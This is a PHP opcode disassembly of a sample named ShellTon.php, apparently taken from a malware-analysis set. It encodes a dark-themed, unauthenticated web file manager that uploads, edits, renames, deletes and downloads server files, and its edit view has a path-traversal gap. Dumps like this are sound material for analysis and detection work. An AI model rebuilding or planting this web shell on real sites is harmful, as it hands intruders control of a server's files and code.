|filename:|/root/samples/ShellTon.php
|functionname:|(null)
|numberofops:|266
|compiledvars:|!0=$current_dir,|!1=$file_to_delete,|!2=$file_to_download,|!3=$old_name,|!4=$new_name,|!5=$target_file,|!6=$file_to_edit,|!7=$new_file_name,|!8=$new_file_path
|line|#*|||op|fetch|ext|return|operands
|4|0|E>|INIT_FCALL||||'define'|
||1||SEND_VAL||||'ROOT_DIR'|
||2||INIT_FCALL||||'realpath'|
||3||SEND_VAL||||'%2Froot%2Fsamples'|
||4||DO_ICALL|||$9|
||5||SEND_VAR||||$9|
||6||DO_ICALL||||
|5|7||FETCH_CONSTANT|||~11|'ROOT_DIR'|
||8||ASSIGN||||!0|,|~11|
|17|9||FETCH_IS|||~13|'_GET'|
||10||ISSET_ISEMPTY_DIM_OBJ||0||~13|,|'dir'|
||11|>|JMPZ||||~14|,|->18|
|18|12|>|INIT_FCALL||||'validatedirectory'|
||13||FETCH_R|global||~15|'_GET'|
||14||FETCH_DIM_R|||~16|~15|,|'dir'|
||15||SEND_VAL||||~16|
||16||DO_FCALL||0|$17|
||17||ASSIGN||||!0|,|$17|
|22|18|>|INIT_FCALL||||'is_dir'|
||19||SEND_VAR||||!0|
||20||DO_ICALL|||$19|
||21||BOOL_NOT|||~20|$19|
||22|>|JMPZ||||~20|,|->25|
|23|23|>|FETCH_CONSTANT|||~21|'ROOT_DIR'|
||24||ASSIGN||||!0|,|~21|
|94|25|>|FETCH_IS|||~23|'_GET'|
||26||ISSET_ISEMPTY_DIM_OBJ||0||~23|,|'delete'|
||27|>|JMPZ||||~24|,|->51|
|95|28|>|CONCAT|||~25|!0|,|'%2F'|
||29||INIT_FCALL||||'basename'|
||30||FETCH_R|global||~26|'_GET'|
||31||FETCH_DIM_R|||~27|~26|,|'delete'|
||32||SEND_VAL||||~27|
||33||DO_ICALL|||$28|
||34||CONCAT|||~29|~25|,|$28|
||35||ASSIGN||||!1|,|~29|
|96|36||INIT_FCALL||||'is_file'|
||37||SEND_VAR||||!1|
||38||DO_ICALL|||$31|
||39|>|JMPZ||||$31|,|->43|
|97|40|>|INIT_FCALL||||'unlink'|
||41||SEND_VAR||||!1|
||42||DO_ICALL||||
|99|43|>|INIT_FCALL||||'header'|
||44||INIT_FCALL||||'urlencode'|
||45||SEND_VAR||||!0|
||46||DO_ICALL|||$33|
||47||CONCAT|||~34|'Location%3A+%3Fdir%3D'|,|$33|
||48||SEND_VAL||||~34|
||49||DO_ICALL||||
|100|50|>|EXIT||||
|104|51|>|FETCH_IS|||~36|'_GET'|
||52||ISSET_ISEMPTY_DIM_OBJ||0||~36|,|'download'|
||53|>|JMPZ||||~37|,|->91|
|105|54|>|CONCAT|||~38|!0|,|'%2F'|
||55||INIT_FCALL||||'basename'|
||56||FETCH_R|global||~39|'_GET'|
||57||FETCH_DIM_R|||~40|~39|,|'download'|
||58||SEND_VAL||||~40|
||59||DO_ICALL|||$41|
||60||CONCAT|||~42|~38|,|$41|
||61||ASSIGN||||!2|,|~42|
|106|62||INIT_FCALL||||'is_file'|
||63||SEND_VAR||||!2|
||64||DO_ICALL|||$44|
||65|>|JMPZ||||$44|,|->91|
|107|66|>|INIT_FCALL||||'header'|
||67||SEND_VAL||||'Content-Description%3A+File+Transfer'|
||68||DO_ICALL||||
|108|69||INIT_FCALL||||'header'|
||70||SEND_VAL||||'Content-Type%3A+application%2Foctet-stream'|
||71||DO_ICALL||||
|109|72||INIT_FCALL||||'header'|
||73||INIT_FCALL||||'basename'|
||74||SEND_VAR||||!2|
||75||DO_ICALL|||$47|
||76||CONCAT|||~48|'Content-Disposition%3A+attachment%3B+filename%3D%22'|,|$47|
||77||CONCAT|||~49|~48|,|'%22'|
||78||SEND_VAL||||~49|
||79||DO_ICALL||||
|110|80||INIT_FCALL||||'header'|
||81||INIT_FCALL||||'filesize'|
||82||SEND_VAR||||!2|
||83||DO_ICALL|||$51|
||84||CONCAT|||~52|'Content-Length%3A+'|,|$51|
||85||SEND_VAL||||~52|
||86||DO_ICALL||||
|111|87||INIT_FCALL||||'readfile'|
||88||SEND_VAR||||!2|
||89||DO_ICALL||||
|112|90|>|EXIT||||
|117|91|>|FETCH_IS|||~55|'_POST'|
||92||ISSET_ISEMPTY_DIM_OBJ||0||~55|,|'rename_file'|
||93|>|JMPZ||||~56|,|->126|
|118|94|>|CONCAT|||~57|!0|,|'%2F'|
||95||INIT_FCALL||||'basename'|
||96||FETCH_R|global||~58|'_POST'|
||97||FETCH_DIM_R|||~59|~58|,|'old_name'|
||98||SEND_VAL||||~59|
||99||DO_ICALL|||$60|
||100||CONCAT|||~61|~57|,|$60|
||101||ASSIGN||||!3|,|~61|
|119|102||CONCAT|||~63|!0|,|'%2F'|
||103||INIT_FCALL||||'basename'|
||104||FETCH_R|global||~64|'_POST'|
||105||FETCH_DIM_R|||~65|~64|,|'new_name'|
||106||SEND_VAL||||~65|
||107||DO_ICALL|||$66|
||108||CONCAT|||~67|~63|,|$66|
||109||ASSIGN||||!4|,|~67|
|120|110||INIT_FCALL||||'is_file'|
||111||SEND_VAR||||!3|
||112||DO_ICALL|||$69|
||113|>|JMPZ||||$69|,|->118|
|121|114|>|INIT_FCALL||||'rename'|
||115||SEND_VAR||||!3|
||116||SEND_VAR||||!4|
||117||DO_ICALL||||
|123|118|>|INIT_FCALL||||'header'|
||119||INIT_FCALL||||'urlencode'|
||120||SEND_VAR||||!0|
||121||DO_ICALL|||$71|
||122||CONCAT|||~72|'Location%3A+%3Fdir%3D'|,|$71|
||123||SEND_VAL||||~72|
||124||DO_ICALL||||
|124|125|>|EXIT||||
|128|126|>|FETCH_IS|||~74|'_POST'|
||127||ISSET_ISEMPTY_DIM_OBJ||0||~74|,|'upload'|
||128|>|JMPZ||||~75|,|->158|
|129|129|>|FETCH_R|global||~76|'_FILES'|
||130||FETCH_DIM_R|||~77|~76|,|'file'|
||131||FETCH_DIM_R|||~78|~77|,|'error'|
||132||IS_IDENTICAL||||~78|,|0|
||133|>|JMPZ||||~79|,|->150|
|130|134|>|CONCAT|||~80|!0|,|'%2F'|
||135||INIT_FCALL||||'basename'|
||136||FETCH_R|global||~81|'_FILES'|
||137||FETCH_DIM_R|||~82|~81|,|'file'|
||138||FETCH_DIM_R|||~83|~82|,|'name'|
||139||SEND_VAL||||~83|
||140||DO_ICALL|||$84|
||141||CONCAT|||~85|~80|,|$84|
||142||ASSIGN||||!5|,|~85|
|131|143||INIT_FCALL||||'move_uploaded_file'|
||144||FETCH_R|global||~87|'_FILES'|
||145||FETCH_DIM_R|||~88|~87|,|'file'|
||146||FETCH_DIM_R|||~89|~88|,|'tmp_name'|
||147||SEND_VAL||||~89|
||148||SEND_VAR||||!5|
||149||DO_ICALL||||
|133|150|>|INIT_FCALL||||'header'|
||151||INIT_FCALL||||'urlencode'|
||152||SEND_VAR||||!0|
||153||DO_ICALL|||$91|
||154||CONCAT|||~92|'Location%3A+%3Fdir%3D'|,|$91|
||155||SEND_VAL||||~92|
||156||DO_ICALL||||
|134|157|>|EXIT||||
|138|158|>|FETCH_IS|||~94|'_POST'|
||159||ISSET_ISEMPTY_DIM_OBJ||0||~94|,|'save_file'|
||160|>|JMPZ||||~95|,|->187|
|139|161|>|CONCAT|||~96|!0|,|'%2F'|
||162||INIT_FCALL||||'basename'|
||163||FETCH_R|global||~97|'_POST'|
||164||FETCH_DIM_R|||~98|~97|,|'file_name'|
||165||SEND_VAL||||~98|
||166||DO_ICALL|||$99|
||167||CONCAT|||~100|~96|,|$99|
||168||ASSIGN||||!6|,|~100|
|140|169||INIT_FCALL||||'is_file'|
||170||SEND_VAR||||!6|
||171||DO_ICALL|||$102|
||172|>|JMPZ||||$102|,|->179|
|141|173|>|INIT_FCALL||||'file_put_contents'|
||174||SEND_VAR||||!6|
||175||FETCH_R|global||~103|'_POST'|
||176||FETCH_DIM_R|||~104|~103|,|'file_content'|
||177||SEND_VAL||||~104|
||178||DO_ICALL||||
|143|179|>|INIT_FCALL||||'header'|
||180||INIT_FCALL||||'urlencode'|
||181||SEND_VAR||||!0|
||182||DO_ICALL|||$106|
||183||CONCAT|||~107|'Location%3A+%3Fdir%3D'|,|$106|
||184||SEND_VAL||||~107|
||185||DO_ICALL||||
|144|186|>|EXIT||||
|148|187|>|FETCH_IS|||~109|'_POST'|
||188||ISSET_ISEMPTY_DIM_OBJ||0||~109|,|'create_file'|
||189|>|JMPZ||||~110|,|->211|
|149|190|>|INIT_FCALL||||'basename'|
||191||FETCH_R|global||~111|'_POST'|
||192||FETCH_DIM_R|||~112|~111|,|'new_file_name'|
||193||SEND_VAL||||~112|
||194||DO_ICALL|||$113|
||195||ASSIGN||||!7|,|$113|
|150|196||CONCAT|||~115|!0|,|'%2F'|
||197||CONCAT|||~116|~115|,|!7|
||198||ASSIGN||||!8|,|~116|
|151|199||INIT_FCALL||||'file_put_contents'|
||200||SEND_VAR||||!8|
||201||SEND_VAL||||''|
||202||DO_ICALL||||
|152|203||INIT_FCALL||||'header'|
||204||INIT_FCALL||||'urlencode'|
||205||SEND_VAR||||!0|
||206||DO_ICALL|||$119|
||207||CONCAT|||~120|'Location%3A+%3Fdir%3D'|,|$119|
||208||SEND_VAL||||~120|
||209||DO_ICALL||||
|153|210|>|EXIT||||
|156|211|>|ECHO||||'%0D%0A%3C%21DOCTYPE+html%3E%0D%0A%3Chtml+lang%3D%22fr%22%3E%0D%0A%3Chead%3E%0D%0A++++%3Cmeta+charset%3D%22UTF-8%22%3E%0D%0A++++%3Cmeta+name%3D%22viewport%22+content%3D%22width%3Ddevice-width%2C+initial-scale%3D1.0%22%3E%0D%0A++++%3Ctitle%3EFile+Manager+-+Professionnel%3C%2Ftitle%3E%0D%0A++++%3Cstyle%3E%0D%0A++++++++%2F%2A+Style+am%C3%A9lior%C3%A9+avec+th%C3%A8me+sombre+%2A%2F%0D%0A++++++++body+%7B%0D%0A++++++++++++background-color%3A+%23121212%3B%0D%0A++++++++++++color%3A+%23E0E0E0%3B%0D%0A++++++++++++font-family%3A+Arial%2C+sans-serif%3B%0D%0A++++++++%7D%0D%0A++++++++h1+%7B%0D%0A++++++++++++color%3A+%23BB86FC%3B%0D%0A++++++++++++text-align%3A+center%3B%0D%0A++++++++%7D%0D%0A++++++++table+%7B%0D%0A++++++++++++width%3A+100%25%3B%0D%0A++++++++++++border-collapse%3A+collapse%3B%0D%0A++++++++++++margin-top%3A+20px%3B%0D%0A++++++++%7D%0D%0A++++++++th%2C+td+%7B%0D%0A++++++++++++padding%3A+12px%3B%0D%0A++++++++++++text-align%3A+left%3B%0D%0A++++++++%7D%0D%0A++++++++th+%7B%0D%0A++++++++++++background-color%3A+%23333%3B%0D%0A++++++++++++color%3A+%23BB86FC%3B%0D%0A++++++++%7D%0D%0A++++++++tr%3Anth-child%28even%29+%7B%0D%0A++++++++++++background-color%3A+%23222%3B%0D%0A++++++++%7D%0D%0A++++++++tr%3Anth-child%28odd%29+%7B%0D%0A++++++++++++background-color%3A+%23121212%3B%0D%0A++++++++%7D%0D%0A++++++++a+%7B%0D%0A++++++++++++color%3A+%2303DAC6%3B%0D%0A++++++++++++text-decoration%3A+none%3B%0D%0A++++++++%7D%0D%0A++++++++a%3Ahover+%7B%0D%0A++++++++++++color%3A+%23BB86FC%3B%0D%0A++++++++%7D%0D%0A++++++++button+%7B%0D%0A++++++++++++background-color%3A+%2303DAC6%3B%0D%0A++++++++++++color%3A+%23121212%3B%0D%0A++++++++++++border%3A+none%3B%0D%0A++++++++++++padding%3A+10px+20px%3B%0D%0A++++++++++++cursor%3A+pointer%3B%0D%0A++++++++%7D%0D%0A++++++++button%3Ahover+%7B%0D%0A++++++++++++background-color%3A+%23BB86FC%3B%0D%0A++++++++%7D%0D%0A++++++++input%5Btype%3D%22file%22%5D%2C+input%5Btype%3D%22text%22%5D+%7B%0D%0A++++++++++++color%3A+%23E0E0E0%3B%0D%0A++++++++++++background-color%3A+%23222%3B%0D%0A++++++++++++border%3A+1px+solid+%23BB86FC%3B%0D%0A++++++++++++padding%3A+10px%3B%0D%0A++++++++%7D%0D%0A++++++++.form-container+%7B%0D%0A++++++++++++display%3A+flex%3B%0D%0A++++++++++++justify-content%3A+space-between%3B%0D%0A++++++++++++margin-bottom%3A+20px%3B%0D%0A++++++++%7D%0D%0A++++%3C%2Fstyle%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3E%0D%0A++++%3Ch1%3EFile+Manager%3C%2Fh1%3E%0D%0A%0D%0A++++%3Cp%3ER%C3%A9pertoire+actuel%3A+%3Ca+href%3D%22%3Fdir%3D'|
|226|212||INIT_FCALL||||'urlencode'|
||213||INIT_FCALL||||'dirname'|
||214||SEND_VAR||||!0|
||215||DO_ICALL|||$122|
||216||SEND_VAR||||$122|
||217||DO_ICALL|||$123|
||218||ECHO||||$123|
||219||ECHO||||'%22+style%3D%22color%3A+%2303DAC6%3B%22%3E'|
||220||INIT_FCALL||||'htmlspecialchars'|
||221||SEND_VAR||||!0|
||222||DO_ICALL|||$124|
||223||ECHO||||$124|
||224||ECHO||||'%3C%2Fa%3E%3C%2Fp%3E%0D%0A%0D%0A++++%3Cdiv+class%3D%22form-container%22%3E%0D%0A++++++++%3C%21--+Formulaire+pour+t%C3%A9l%C3%A9charger+un+fichier+--%3E%0D%0A++++++++%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%0D%0A++++++++++++%3Cinput+type%3D%22file%22+name%3D%22file%22+required%3E%0D%0A++++++++++++%3Cbutton+type%3D%22submit%22+name%3D%22upload%22%3ET%C3%A9l%C3%A9charger%3C%2Fbutton%3E%0D%0A++++++++%3C%2Fform%3E%0D%0A%0D%0A++++++++%3C%21--+Formulaire+pour+cr%C3%A9er+un+fichier+--%3E%0D%0A++++++++%3Cform+method%3D%22post%22%3E%0D%0A++++++++++++%3Cinput+type%3D%22text%22+name%3D%22new_file_name%22+placeholder%3D%22Nom+du+fichier%22+required%3E%0D%0A++++++++++++%3Cbutton+type%3D%22submit%22+name%3D%22create_file%22%3ECr%C3%A9er+un+fichier%3C%2Fbutton%3E%0D%0A++++++++%3C%2Fform%3E%0D%0A++++%3C%2Fdiv%3E%0D%0A%0D%0A++++%3Ctable%3E%0D%0A++++++++%3Cthead%3E%0D%0A++++++++++++%3Ctr%3E%0D%0A++++++++++++++++%3Cth%3ENom+du+fichier%3C%2Fth%3E%0D%0A++++++++++++++++%3Cth%3ETaille%3C%2Fth%3E%0D%0A++++++++++++++++%3Cth%3EActions%3C%2Fth%3E%0D%0A++++++++++++%3C%2Ftr%3E%0D%0A++++++++%3C%2Fthead%3E%0D%0A++++++++%3Ctbody%3E%0D%0A++++++++++++'|
|251|225||INIT_FCALL||||'listdirectory'|
||226||SEND_VAR||||!0|
||227||DO_FCALL||0||
|252|228||ECHO||||'++++++++%3C%2Ftbody%3E%0D%0A++++%3C%2Ftable%3E%0D%0A%0D%0A++++%3C%21--+Formulaire+de+renommage+--%3E%0D%0A++++'|
|256|229||FETCH_IS|||~126|'_GET'|
||230||ISSET_ISEMPTY_DIM_OBJ||0||~126|,|'rename'|
||231|>|JMPZ||||~127|,|->240|
|257|232|>|ECHO||||'++++%3Cform+method%3D%22post%22%3E%0D%0A++++++++%3Cinput+type%3D%22hidden%22+name%3D%22old_name%22+value%3D%22'|
|258|233||INIT_FCALL||||'htmlspecialchars'|
||234||FETCH_R|global||~128|'_GET'|
||235||FETCH_DIM_R|||~129|~128|,|'rename'|
||236||SEND_VAL||||~129|
||237||DO_ICALL|||$130|
||238||ECHO||||$130|
||239||ECHO||||'%22%3E%0D%0A++++++++%3Cinput+type%3D%22text%22+name%3D%22new_name%22+placeholder%3D%22Nouveau+nom%22+required%3E%0D%0A++++++++%3Cbutton+type%3D%22submit%22+name%3D%22rename_file%22%3ERenommer%3C%2Fbutton%3E%0D%0A++++%3C%2Fform%3E%0D%0A++++'|
|263|240|>|ECHO||||'%0D%0A++++%3C%21--+Formulaire+de+modification+--%3E%0D%0A++++'|
|265|241||FETCH_IS|||~131|'_GET'|
||242||ISSET_ISEMPTY_DIM_OBJ||0||~131|,|'edit'|
||243|>|JMPZ||||~132|,|->264|
|266|244|>|ECHO||||'++++%3Cform+method%3D%22post%22%3E%0D%0A++++++++%3Cinput+type%3D%22hidden%22+name%3D%22file_name%22+value%3D%22'|
|267|245||INIT_FCALL||||'htmlspecialchars'|
||246||FETCH_R|global||~133|'_GET'|
||247||FETCH_DIM_R|||~134|~133|,|'edit'|
||248||SEND_VAL||||~134|
||249||DO_ICALL|||$135|
||250||ECHO||||$135|
||251||ECHO||||'%22%3E%0D%0A++++++++%3Ctextarea+name%3D%22file_content%22+required%3E'|
|268|252||INIT_FCALL||||'htmlspecialchars'|
||253||INIT_FCALL||||'file_get_contents'|
||254||CONCAT|||~136|!0|,|'%2F'|
||255||FETCH_R|global||~137|'_GET'|
||256||FETCH_DIM_R|||~138|~137|,|'edit'|
||257||CONCAT|||~139|~136|,|~138|
||258||SEND_VAL||||~139|
||259||DO_ICALL|||$140|
||260||SEND_VAR||||$140|
||261||DO_ICALL|||$141|
||262||ECHO||||$141|
||263||ECHO||||'%3C%2Ftextarea%3E%0D%0A++++++++%3Cbr%3E%0D%0A++++++++%3Cbutton+type%3D%22submit%22+name%3D%22save_file%22%3ESauvegarder+les+modifications%3C%2Fbutton%3E%0D%0A++++%3C%2Fform%3E%0D%0A++++'|
|273|264|>|ECHO||||'%0D%0A%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A'|
|276|265|>|RETURN||||1|
|
|Functionvalidatedirectory:
|filename:|/root/samples/ShellTon.php
|functionname:|validateDirectory
|numberofops:|18
|compiledvars:|!0=$dir,|!1=$realpath
|line|#*|||op|fetch|ext|return|operands
|8|0|E>|RECV|||!0|
|9|1||INIT_FCALL||||'realpath'|
||2||SEND_VAR||||!0|
||3||DO_ICALL|||$2|
||4||ASSIGN||||!1|,|$2|
|10|5|>|JMPZ_EX|||~4|!1|,|->13|
||6|>|INIT_FCALL||||'strpos'|
||7||SEND_VAR||||!1|
||8||FETCH_CONSTANT|||~5|'ROOT_DIR'|
||9||SEND_VAL||||~5|
||10||DO_ICALL|||$6|
||11||IS_IDENTICAL|||~7|$6|,|0|
||12||BOOL|||~4|~7|
||13|>>|JMPZ||||~4|,|->15|
|11|14|>>|RETURN||||!1|
|13|15|>|FETCH_CONSTANT|||~8|'ROOT_DIR'|
||16|>|RETURN||||~8|
|14|17|*>|RETURN||||null|
|
|Endoffunctionvalidatedirectory

|Functionlistdirectory:
|filename:|/root/samples/ShellTon.php
|functionname:|listDirectory
|numberofops:|83
|compiledvars:|!0=$dir,|!1=$files,|!2=$directories,|!3=$regular_files,|!4=$file,|!5=$file_path,|!6=$directory
|line|#*|||op|fetch|ext|return|operands
|27|0|E>|RECV|||!0|
|29|1||INIT_FCALL||||'scandir'|
||2||SEND_VAR||||!0|
||3||DO_ICALL|||$7|
||4||ASSIGN||||!1|,|$7|
|30|5||ASSIGN||||!2|,|<array>|
|31|6||ASSIGN||||!3|,|<array>|
|33|7|>|FE_RESET_R|||$11|!1|,|->27|
||8|>>|FE_FETCH_R||||$11|,|!4|,->27|
|34|9|>|IS_NOT_EQUAL|||~12|!4|,|'.'|
||10|>|JMPZ_EX|||~12|~12|,|->13|
||11|>|IS_NOT_EQUAL|||~13|!4|,|'..'|
||12||BOOL|||~12|~13|
||13|>>|JMPZ||||~12|,|->26|
|35|14|>|CONCAT|||~14|!0|,|'%2F'|
||15||CONCAT|||~15|~14|,|!4|
||16||ASSIGN||||!5|,|~15|
|36|17||INIT_FCALL||||'is_dir'|
||18||SEND_VAR||||!5|
||19||DO_ICALL|||$17|
||20|>|JMPZ||||$17|,|->24|
|37|21|>|ASSIGN_DIM||||!2|
||22||OP_DATA||||!4|
||23|>|JMP||||->26|
|39|24|>|ASSIGN_DIM||||!3|
||25||OP_DATA||||!4|
|33|26|>>|JMP||||->8|
||27|>|FE_FREE||||$11|
|45|28|>|FE_RESET_R|||$20|!2|,|->54|
||29|>>|FE_FETCH_R||||$20|,|!6|,->54|
|46|30|>|ECHO||||'%3Ctr%3E'|
|47|31||INIT_FCALL||||'urlencode'|
||32||CONCAT|||~21|!0|,|'%2F'|
||33||CONCAT|||~22|~21|,|!6|
||34||SEND_VAL||||~22|
||35||DO_ICALL|||$23|
||36||CONCAT|||~24|'%3Ctd%3E%3Ca+href%3D%22%3Fdir%3D'|,|$23|
||37||CONCAT|||~25|~24|,|'%22%3E%F0%9F%93%81+'|
||38||INIT_FCALL||||'htmlspecialchars'|
||39||SEND_VAR||||!6|
||40||DO_ICALL|||$26|
||41||CONCAT|||~27|~25|,|$26|
||42||CONCAT|||~28|~27|,|'%3C%2Fa%3E%3C%2Ftd%3E'|
||43||ECHO||||~28|
|48|44||ECHO||||'%3Ctd%3EFolder%3C%2Ftd%3E'|
|49|45||INIT_FCALL_BY_NAME||||'getFileActions'|
||46||SEND_VAR_EX||||!0|
||47||SEND_VAR_EX||||!6|
||48||DO_FCALL||0|$29|
||49||CONCAT|||~30|'%3Ctd%3E'|,|$29|
||50||CONCAT|||~31|~30|,|'%3C%2Ftd%3E'|
||51||ECHO||||~31|
|50|52||ECHO||||'%3C%2Ftr%3E'|
|45|53|>|JMP||||->29|
||54|>|FE_FREE||||$20|
|54|55|>|FE_RESET_R|||$32|!3|,|->81|
||56|>>|FE_FETCH_R||||$32|,|!4|,->81|
|55|57|>|ECHO||||'%3Ctr%3E'|
|56|58||INIT_FCALL||||'htmlspecialchars'|
||59||SEND_VAR||||!4|
||60||DO_ICALL|||$33|
||61||CONCAT|||~34|'%3Ctd%3E'|,|$33|
||62||CONCAT|||~35|~34|,|'%3C%2Ftd%3E'|
||63||ECHO||||~35|
|57|64||INIT_FCALL_BY_NAME||||'formatFileSize'|
||65||CONCAT|||~36|!0|,|'%2F'|
||66||CONCAT|||~37|~36|,|!4|
||67||SEND_VAL_EX||||~37|
||68||DO_FCALL||0|$38|
||69||CONCAT|||~39|'%3Ctd%3E'|,|$38|
||70||CONCAT|||~40|~39|,|'%3C%2Ftd%3E'|
||71||ECHO||||~40|
|58|72||INIT_FCALL_BY_NAME||||'getFileActions'|
||73||SEND_VAR_EX||||!0|
||74||SEND_VAR_EX||||!4|
||75||DO_FCALL||0|$41|
||76||CONCAT|||~42|'%3Ctd%3E'|,|$41|
||77||CONCAT|||~43|~42|,|'%3C%2Ftd%3E'|
||78||ECHO||||~43|
|59|79||ECHO||||'%3C%2Ftr%3E'|
|54|80|>|JMP||||->56|
||81|>|FE_FREE||||$32|
|61|82|>|RETURN||||null|
|
|Endoffunctionlistdirectory

|Functionformatfilesize:
|filename:|/root/samples/ShellTon.php
|functionname:|formatFileSize
|numberofops:|32
|compiledvars:|!0=$file,|!1=$size
|line|#*|||op|fetch|ext|return|operands
|64|0|E>|RECV|||!0|
|66|1||INIT_FCALL||||'is_file'|
||2||SEND_VAR||||!0|
||3||DO_ICALL|||$2|
||4|>|JMPZ||||$2|,|->30|
|67|5|>|INIT_FCALL||||'filesize'|
||6||SEND_VAR||||!0|
||7||DO_ICALL|||$3|
||8||ASSIGN||||!1|,|$3|
|68|9||IS_SMALLER_OR_EQUAL||||1048576|,|!1|
||10|>|JMPZ||||~5|,|->19|
|69|11|>|INIT_FCALL||||'round'|
||12||DIV|||~6|!1|,|1048576|
||13||SEND_VAL||||~6|
||14||SEND_VAL||||2|
||15||DO_ICALL|||$7|
||16||CONCAT|||~8|$7|,|'+MB'|
||17|>|RETURN||||~8|
||18|*|JMP||||->28|
|70|19|>|IS_SMALLER_OR_EQUAL||||1024|,|!1|
||20|>|JMPZ||||~9|,|->28|
|71|21|>|INIT_FCALL||||'round'|
||22||DIV|||~10|!1|,|1024|
||23||SEND_VAL||||~10|
||24||SEND_VAL||||2|
||25||DO_ICALL|||$11|
||26||CONCAT|||~12|$11|,|'+KB'|
||27|>|RETURN||||~12|
|73|28|>|CONCAT|||~13|!1|,|'+bytes'|
||29|>|RETURN||||~13|
|75|30|>>|RETURN||||'N%2FA'|
|76|31|*>|RETURN||||null|
|
|Endoffunctionformatfilesize

|Functiongetfileactions:
|filename:|/root/samples/ShellTon.php
|functionname:|getFileActions
|numberofops:|32
|compiledvars:|!0=$dir,|!1=$file,|!2=$url_dir,|!3=$file_url,|!4=$actions
|line|#*|||op|fetch|ext|return|operands
|79|0|E>|RECV|||!0|
||1||RECV|||!1|
|81|2||INIT_FCALL||||'urlencode'|
||3||SEND_VAR||||!0|
||4||DO_ICALL|||$5|
||5||ASSIGN||||!2|,|$5|
|82|6||INIT_FCALL||||'urlencode'|
||7||SEND_VAR||||!1|
||8||DO_ICALL|||$7|
||9||ASSIGN||||!3|,|$7|
|84|10||CONCAT|||~9|'%3Ca+href%3D%22%3Fdir%3D'|,|!2|
||11||CONCAT|||~10|~9|,|'%26edit%3D'|
||12||CONCAT|||~11|~10|,|!3|
||13||CONCAT|||~12|~11|,|'%22%3EEdit%3C%2Fa%3E+%7C+'|
||14||ASSIGN||||!4|,|~12|
|85|15||CONCAT|||~14|'%3Ca+href%3D%22%3Fdir%3D'|,|!2|
||16||CONCAT|||~15|~14|,|'%26delete%3D'|
||17||CONCAT|||~16|~15|,|!3|
||18||CONCAT|||~17|~16|,|'%22%3EDelete%3C%2Fa%3E+%7C+'|
||19||ASSIGN_OP||8||!4|,|~17|
|86|20||CONCAT|||~19|'%3Ca+href%3D%22%3Fdir%3D'|,|!2|
||21||CONCAT|||~20|~19|,|'%26rename%3D'|
||22||CONCAT|||~21|~20|,|!3|
||23||CONCAT|||~22|~21|,|'%22%3ERename%3C%2Fa%3E+%7C+'|
||24||ASSIGN_OP||8||!4|,|~22|
|87|25||CONCAT|||~24|'%3Ca+href%3D%22%3Fdir%3D'|,|!2|
||26||CONCAT|||~25|~24|,|'%26download%3D'|
||27||CONCAT|||~26|~25|,|!3|
||28||CONCAT|||~27|~26|,|'%22%3EDownload%3C%2Fa%3E'|
||29||ASSIGN_OP||8||!4|,|~27|
|88|30|>|RETURN||||!4|
|89|31|*>|RETURN||||null|
|
|Endoffunctiongetfileactions

